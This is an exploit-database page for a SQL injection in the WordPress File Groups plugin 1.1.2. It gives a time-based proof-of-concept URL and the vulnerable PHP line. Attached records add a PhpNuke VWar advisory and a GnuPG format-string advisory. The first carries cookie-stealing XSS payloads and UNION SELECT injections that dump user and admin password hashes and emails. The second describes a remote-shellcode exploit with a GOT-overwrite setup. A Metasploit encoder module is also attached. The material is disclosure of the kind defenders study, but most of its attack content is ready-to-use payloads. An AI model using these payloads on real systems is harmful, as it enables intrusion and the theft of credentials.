Search...

WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability

2011-08-17T00:00:00

ID 1337DAY-ID-16705
Type zdt
Reporter Miroslav Stampar
Modified 2011-08-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: WordPress File Groups plugin &lt;= 1.1.2 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip
# Version: 1.1.2 (tested)
 
---
PoC
---
http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))
 
---------------
Vulnerable code
---------------
$fgid = $_GET['fgid'];
 
...
 
$file_list = $wpdb-&gt;get_col("select guid from wp_posts where post_parent = $fgid");



#  0day.today [2018-01-02]  #

JSON Vulners Source

Initial Source

{"hash": "170dd94179be49728f4d2508fda392cc9e6bf1dbc02e3cebd06197bad210fb7a", "id": "1337DAY-ID-16705", "lastseen": "2018-01-02T15:10:23", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "c6755af436b904d6c02caeeb3fbefae5", "key": "href"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "modified"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0f09ce50f703215a5b3963638aa69b7d", "key": "reporter"}, {"hash": "f767ed4d80b39dc0f50d9fbed25dc5ef", "key": "sourceData"}, {"hash": "75aa87c3a42ad07f19f58ce6cb2832bb", "key": "sourceHref"}, {"hash": "22d8d63c873c7e6b8f58b2682cff40d1", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-01-02T15:10:23"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16705", "SECURITYVULNS:DOC:1674"]}], "modified": "2018-01-02T15:10:23"}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16705", "description": "Exploit for php platform in category web applications", "title": "WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "4c4ac8ece5c8e26267afc559e52298a2fb1d31ad495ae9f71f94a95b40128a4b", "id": "1337DAY-ID-16705", "lastseen": "2016-04-19T01:35:04", "enchantments": {"score": {"value": 3.7, "modified": "2016-04-19T01:35:04"}}, "hashmap": [{"hash": "7d46d5e2ef181ca0a7b3607fbe07df56", "key": "sourceData"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0f09ce50f703215a5b3963638aa69b7d", "key": "reporter"}, {"hash": "22d8d63c873c7e6b8f58b2682cff40d1", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "dd5f0dea8892b5309f9000718cc6a625", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "modified"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "1f7e32d26a3375ae831b8e61c2b27096", "key": "href"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16705", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability\r\n# Date: 2011-08-17\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip\r\n# Version: 1.1.2 (tested)\r\n \r\n---\r\nPoC\r\n---\r\nhttp://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n$fgid = $_GET['fgid'];\r\n \r\n...\r\n \r\n$file_list = $wpdb->get_col(\"select guid from wp_posts where post_parent = $fgid\");\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2011-08-17T00:00:00", "references": [], "reporter": "Miroslav Stampar", "modified": "2011-08-17T00:00:00", "href": "http://0day.today/exploit/description/16705"}, "lastseen": "2016-04-19T01:35:04", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability\r\n# Date: 2011-08-17\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip\r\n# Version: 1.1.2 (tested)\r\n \r\n---\r\nPoC\r\n---\r\nhttp://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n$fgid = $_GET['fgid'];\r\n \r\n...\r\n \r\n$file_list = $wpdb->get_col(\"select guid from wp_posts where post_parent = $fgid\");\r\n\r\n\n\n# 0day.today [2018-01-02] #", "published": "2011-08-17T00:00:00", "references": [], "reporter": "Miroslav Stampar", "modified": "2011-08-17T00:00:00", "href": "https://0day.today/exploit/description/16705"}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "\r\n\r\n[waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke\r\n\r\n\r\nAuthor: Janek Vind "waraxe"\r\nDate: 13. April 2007\r\nLocation: Estonia, Tartu\r\nWeb: http://www.waraxe.us/advisory-48.html\r\n\r\n\r\nTarget software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nVWar module for PhpNuke\r\n\r\nhttp://www.vwar.de/\r\n\r\nVWar is a webbased matchorganizing system for online gamers.\r\nThe complete output is realised by PHP with MySQL as database backend.\r\nThe system is divided into 2 parts, the public area and the admin area.\r\n\r\nVWar 1.5.0 R15 is out.\r\nChanges:\r\nfixed: mysql injection bug in extra/ files\r\n\r\n// I guess, they have not fixed all the bugs yet :) //\r\n\r\nAffected are Virtual War versions 1.5 R15 and below\r\n \r\n\r\nVulnerabilities:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nFound security bugs: one critical sql injection and two XSS bugs.\r\nThere are probably more vulnerabilities, had no time for deeper analyze ...\r\n\r\n\r\n1. XSS in "/modules/vwar/extra/today.php"\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nhttp://www.target.com/modules/vwar/extra/today.php?whattoshow=3&title=kala<script>alert(document.cookie);</script>\r\n\r\nProblem is caused by uninitialized variable "$title". Successful exploitation requires that "register_globals" is "on"\r\nin php settings.\r\n\r\n\r\n2. XSS in "/modules/vwar/extra/login.php"\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nhttp://www.target.com/modules/vwar/extra/login.php?memberlist=</select></form><script>alert(document.cookie);</script>\r\n\r\nSimilar to previous case this XSS is caused by uninitialized variable, in this time "$memberlist".\r\nSuccessful exploitation requires that "register_globals" is "on" in php settings.\r\n\r\n\r\n3. Critical sql injection bug in many VWar scripts\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nPersonally, I like uninitialized variables in php source code. They are giving so much cool possibilities to\r\neveryone, who is searching for secutity holes. And this serious sql injection case has his roots in same problem.\r\n\r\nLet's look @ "/modules/vwar/extra/online.php" line 63:\r\n\r\n----------------[ from source code ]------------------\r\n$query = $vwardb->query("\r\n SELECT memberid, name, lastactivity\r\n FROM vwar".$n."_member WHERE lastactivity > ".(time() - $onlinetime * 60)."\r\n");\r\n----------------[ /from source code ]-----------------\r\n\r\nAnd by the way - "$n" variable is not initialized! So what happens, if we issue this query:\r\n\r\nhttp://www.victim.com/modules/vwar/extra/online.php?n=waraxe\r\n\r\nOops... We got error message:\r\n\r\n\r\n-> Database Error: Invalid SQL: \r\n SELECT memberid, name, lastactivity\r\n FROM vwarwaraxe_member WHERE lastactivity > 1176476015\r\n\r\n-> MySQL Error: Table 'victimdb.vwarwaraxe_member' doesn't exist\r\n-> MySQL Error Number: 1146\r\n-> Date: 11.04.2007 @ 18:03\r\n-> Script: /modules/vwar/extra/online.php?n=waraxe\r\n-> Referer: \r\n\r\nNow, can we exploit this sql injection? Let's try next move:\r\n\r\nhttp://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,@@version,3/*\r\n\r\n4.1.22\r\n\r\nIt works!! Now it's time for more serious fun:\r\n\r\n[[[[[ kidd0z - attentione ]]]]]\r\n\r\nhttp://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+\r\nUNION+ALL+SELECT+1,CONCAT(name,CHAR(94),password,CHAR(94),email),3+FROM+vwar_member/*\r\n\r\n... and we get all vwar member usernames, password double-md5 hashes and emails\r\n\r\nhttp://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+\r\nUNION+ALL+SELECT+1,CONCAT(aid,CHAR(94),pwd,CHAR(94),email),3+FROM+nuke_authors/*\r\n\r\n... and we have all the nuke admin usernames, md5 hashes and emails\r\n\r\nhttp://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+\r\nUNION+ALL+SELECT+1,CONCAT(username,CHAR(94),user_password,CHAR(94),user_email),3+FROM+nuke_users/*\r\n\r\n... and finally, all the nuke user credentials in one big listing :)\r\n\r\nRemarks:\r\n\r\nR01 - Sentinel, Protector and other powerful phpnuke protection systems - they will not work\r\nagainst this exploits. Because we are not entering from front door, but will use rear window :)\r\n\r\nR02 - "register_globals" must be "on" for exploits to work\r\n\r\nR03 - phpnuke table prefix can be changed from default, in this case - no nuke user and admin data!\r\n\r\nR04 - there can be need for playing with "$n" value. Because vwar module installer can assaign different\r\nvalues besides empty value. So if default exploit will not work, then this can be tried:\r\n\r\n/online.php?n=0_member+WHERE\r\n/online.php?n=1_member+WHERE\r\n/online.php?n=2_member+WHERE\r\n\r\n... and so on. \r\nAnd because we have perfect sql error feedback, then it is easy to overcome various exploiting problems.\r\n\r\nR05 - many other scripts in "extra" directory have same sql injection vulnerability!\r\n\r\n\r\nSee ya soon and have a nice day ;)\r\n\r\n\r\nGreetings:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nGreets to LINUX, Heintz, slimjim100, shai-tan, y3dips and all\r\nother people who know me! \r\n\r\nSpecial greets goes to Raido Kerna.\r\n\r\nTervitusi Torufoorumi rahvale!\r\n\r\n\r\nContact:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ncome2waraxe@yahoo.com\r\nJanek Vind "waraxe"\r\n\r\nHomepage: http://www.waraxe.us/\r\n\r\n\r\nShameless advertise:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nDX expedition database - http://www.dxdb.com/\r\nAmateur Radio Database - http://www.hamdb.com/\r\n\r\n---------------------------------- [ EOF ] ------------------------------------\r\n\r\n", "modified": "2007-04-13T00:00:00", "published": "2007-04-13T00:00:00", "id": "SECURITYVULNS:DOC:16705", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16705", "title": "[waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:04", "bulletinFamily": "software", "description": "---------------------------------------------------------------------------\r\n Remote arbitrary code execution vulnerability in GnuPG <=\r\n1.0.5\r\n \r\n Synnergy Networks (http://www.synnergy.net/)\r\n By: fish stiqz <fish@synnergy.net>\r\n Released: 05/29/2001\r\n---------------------------------------------------------------------------\r\n ( Will the REAL GnuPG bug please stand up? )\r\n---------------------------------------------------------------------------\r\n\r\n---------------------------------------------------------------------------\r\n[ Contents of this Advisory ]\r\n\r\n0. Introduction\r\n1. Problem\r\n2. Solution\r\n3. Exploit Discussion\r\n4. Credit and Thanks\r\n\r\n---------------------------------------------------------------------------\r\n[ Introduction ]\r\n\r\nGnuPG is a very popular GNU replacement for the public key\r\nencryption\r\nprogram PGP. As described by its website (http://www.gnupg.org/):\r\n\r\n> GnuPG is a complete and free replacement for PGP. Because it\r\n> does not\r\n> use the patented IDEA algorithm, it can be used without any\r\n> restrictions. GnuPG is a RFC2440 (OpenPGP) compliant\r\n> application. \r\n\r\nHidden deep within its code is a format string vulnerability\r\nwhich can be\r\ntriggered simply by attempting to decrypt a file with a specially\r\ncrafted\r\nfilename. This vulnerability can allow a malicious user to gain\r\nunathorized access to the account which attempted the decryption.\r\n\r\n---------------------------------------------------------------------------\r\n[ Problem ]\r\n\r\nThe problem code lies in util/ttyio.c in the 'do_get' function. \r\nThere is\r\na call to a function called 'tty_printf' (which eventually\r\nresults in a\r\nvfprintf call) without a constant format string:\r\n\r\n> tty_printf( prompt );\r\n\r\nIf gpg attempts to decrypt a file whose filename does not end in\r\n".gpg",\r\nthat filename (minus the extension) is copied to the prompt\r\nstring,\r\nallowing a user-suppliable format string. \r\n\r\n---------------------------------------------------------------------------\r\n[ Solution ]\r\n\r\nThe vulnerable call obviously needs the "%s" conversion:\r\n\r\n> tty_printf( "%s", prompt );\r\n\r\nThe newest release of GnuPG (version 1.0.6) contains this\r\nsecurity fix, \r\nas well as implementing many new features. It can be obtained\r\nfrom\r\nhttp://www.gnupg.org/download.html. All GnuPG users are strongly\r\nurged to\r\nupgrade as soon as possible.\r\n\r\n---------------------------------------------------------------------------\r\n[ Exploit Discussion]\r\n\r\nIn order to show the severity of the bug, look first at how it is\r\nreproduced.\r\n\r\n1. Create a file with a valid format string as the filename.\r\n\r\n $ echo "hello, how are you friend?" > %8x_%8x_%8x\r\n\r\n2. Encrypt this file.\r\n\r\n $ gpg -r fish@analog.org -e %8x_%8x_%8x\r\n gpg: this cipher algorithm is depreciated; please use a more\r\nstandard one!\r\n\r\n $ ls %8x_%8x_%8x*\r\n %8x_%8x_%8x %8x_%8x_%8x.gpg\r\n\r\n3. gpg added the ".gpg" extension to the new encrypted file, give\r\nit a\r\ndifferent one.\r\n\r\n $ mv %8x_%8x_%8x.gpg %8x_%8x_%8x.el8\r\n\r\n4. Now, attempt to decrypt the file.\r\n\r\n $ gpg %8x_%8x_%8x.el8\r\n\r\n You need a passphrase to unlock the secret key for\r\n user: "fish stiqz (bleh) <fish@analog.org>"\r\n 1024-bit ELG-E key, ID D31DF63D, created 2001-05-24 (main key\r\nID 5ABD075F)\r\n\r\n gpg: %8x_%8x_%8x.el8: unknown suffix\r\n Enter new filename [ 80af5d9_ 80cefb8_ 80af5ca]: \r\n\r\nNow you will notice that the %8x's were expanded! However, the\r\nactual\r\nfilename is not our format string. The original filename, which\r\nis stored\r\ninside the file as part of the encrypted data, is the real format\r\nstring. \r\nSo the file could be renamed again and still produce the same\r\nresult:\r\n\r\n $ mv %8x_%8x_%8x.el8 README.TXT\r\n $ gpg README.TXT\r\n\r\n You need a passphrase to unlock the secret key for\r\n user: "fish stiqz (bleh) <fish@analog.org>"\r\n 1024-bit ELG-E key, ID D31DF63D, created 2001-05-24 (main key\r\nID 5ABD075F)\r\n\r\n gpg: README.TXT: unknown suffix\r\n Enter new filename [ 80af5d9_ 80cefb0_ 80af5ca]: \r\n\r\n\r\nThe exploit I have created simply creates and encrypts a file that\r\nexploits this vulnerability. However, considering that there is\r\nno\r\npossible way to determine what type of machine the file will be\r\ndecrypted\r\non, the size of the remote environment, the location that libc is\r\nmapped,\r\netc... the exploit will require a lot of knowledge about the\r\nremote system\r\nfor it to work. For this reason, this exploit can be considered\r\n"Proof of\r\nConcept".\r\n\r\nThere were a few hurdles to get around while building this\r\nexploit. \r\n\r\nFirst, since this a remote attack, there are only two\r\nways to feed data to gpg. 1) Through the filename and 2) through \r\nthe encrypted data inside the file. Option #1 seemed easiest to\r\nuse, so I used it.\r\n\r\nSecond, since there are limitations on the size of a filename,\r\n255 bytes\r\non Linux systems for example, we need a small format string and a\r\nsmall\r\nremote shellcode. The format string and shellcode combination\r\nwould be\r\nlocated on the stack, allowing the Linux kernel patch from the\r\nOpenwall \r\nProject to defend against this kind of attack. However, this is\r\nnot\r\nacceptable for an exploit by fish stiqz ;-). Before the\r\nvulnerable call,\r\nthe prompt is created on the heap, and the format string copied to\r\nit. The filename (our format string and shellcode combination)\r\ntaken from\r\nthe data inside the file, is also copied to the heap, allowing\r\ntwo\r\ndifferent places to store a remote shellcode on the heap. The\r\nfirst\r\nlocation is complicated by the fact that the prompt is filtered\r\nthrough\r\niscntrl(), escaping all characters in the range of 0x00-0x1f and \r\n0x7f. But, since I thought it would be fun to make some remote\r\nshellcode\r\nto get around this, I chose to use the first location on the\r\nheap, but\r\neither one is fine.\r\n\r\nExample exploitation: \r\n(overwrite the GOT entry of malloc() to point to the shellcode on\r\nthe heap)\r\n\r\n(from config.h in the exploit)\r\n\r\n/* <FIXME> */\r\n\r\n/* location of the *local* copy of gpg, used to encrypt the file\r\n*/\r\n#define DEFAULT_GPG_PATH "/usr/local/bin/gpg"\r\n\r\n/* contents appended to the format string, or NULL if you want to\r\nskip it */\r\n#define APPEND lnx_i386_remote_shellcode\r\n\r\n/* only needed if appending APPEND is defined, NULL if you wanna\r\nskip */\r\n#define ARCHNOP "\x90"\r\n\r\n/* the overwrites (most definitely needed) */\r\nshort_write_t short_array[] =\r\n{\r\n /* overwrite 0x080c9dc4 (GOT of malloc) with 0x080cca60\r\n(shellcode) */\r\n { 0xca60, 0x080c9dc4 + 0 },\r\n { 0x080c, 0x080c9dc4 + 2 },\r\n { 0, 0 }\r\n};\r\n\r\n/* </FIXME> */\r\n\r\n\r\nMake the backdoored file:\r\n\r\n $ make clean && make\r\n rm -f *~ *.o gnupig \r\n gcc -Wall -O2 -g -c gnupig.c\r\n gcc -Wall -O2 -g -c common.c\r\n gcc -Wall -O2 -g -c file.c\r\n gcc -Wall -O2 -g -c shellcode.c\r\n gcc -Wall -O2 -g -c fmtstr.c\r\n gcc -Wall -O2 -g -o gnupig gnupig.o common.o file.o shellcode.o\r\nfmtstr.o \r\n\r\n $ ./gnupig -s -e 366 -a 4 -k fish@analog.org \r\n [0] shellcode passed.\r\n [1] running gpg to encrypt the dummy file.\r\n gpg: this cipher algorithm is depreciated; please use a more\r\nstandard one!\r\n [2] created dummy file successfully.\r\n\r\nUser runs gpg on the encrypted file:\r\n\r\n $ gpg *.el8\r\n ... \r\n \r\nRemote shell is spawned:\r\n\r\n (in other terminal)\r\n $ telnet localhost 16705\r\n Trying 127.0.0.1...\r\n Connected to localhost.\r\n Escape character is '^]'.\r\n id; \r\n uid=1000(fish) gid=100(users)\r\n exit;\r\n Connection closed by foreign host.\r\n\r\n\r\nThere are a few other tricks you can do, like doing a return into\r\nlibc \r\nattacks and writing the payload with the format string, which can\r\nbe\r\nperformed by this exploit. It is a very versatile tool. \r\nUnfortunately,\r\nor fortunately (depending on your point of view), these types of \r\nattacks will also be unreliable (due to the fact that we dont\r\nknow the\r\nremote environment or how gpg is spawned). \r\n\r\n-------------------------------------------------------------------------\r\n[ Credit and Thanks ]\r\n\r\nThanks to the GnuPG developers for an excellent program.\r\n\r\nMany thanks to all of those involved with this. MaXX and dethy,\r\nyou\r\nhave been some great guys to work with, thanks for all the help.\r\n\r\nShouts:\r\n - MaXX and dethy - you guys RULE!\r\n - scrippie for the format string generation ideas.\r\n - venomous for the late night irc conversation ;-)\r\n - ysyi & async.org\r\n\r\n-------------------------------------------------------------------------\r\n\r\nAs always, if updates of this exploit or advisory are made, they\r\nwill\r\nbe posted to my website: http://gibson.analog.org/\r\n\r\nThe exploit code is attached.\r\n\r\n- fish stiqz\r\n Synnergy Networks", "modified": "2001-05-30T00:00:00", "published": "2001-05-30T00:00:00", "id": "SECURITYVULNS:DOC:1674", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1674", "title": "[synnergy] - GnuPG remote format string vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2019-11-27T15:37:16", "bulletinFamily": "exploit", "description": "This \"encoder\" does not transform the payload in any way.\n", "modified": "2017-07-24T13:26:21", "published": "2005-10-31T19:15:21", "id": "MSF:ENCODER/GENERIC/NONE", "href": "", "type": "metasploit", "title": "The \"none\" Encoder", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Encoder\n\n def initialize\n super(\n 'Name' => 'The \"none\" Encoder',\n 'Description' => %q{\n This \"encoder\" does not transform the payload in any way.\n },\n 'Author' => 'spoonm',\n 'License' => MSF_LICENSE,\n 'Arch' => ARCH_ALL,\n 'EncoderType' => Msf::Encoder::Type::Raw)\n end\n\n #\n # Simply return the buf straight back.\n #\n def encode_block(state, buf)\n buf\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/encoders/generic/none.rb"}]}

WordPress File Groups plugin &lt;= 1.1.2 SQL Injection Vulnerability

Description

Exploit for php platform in category web applications

WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability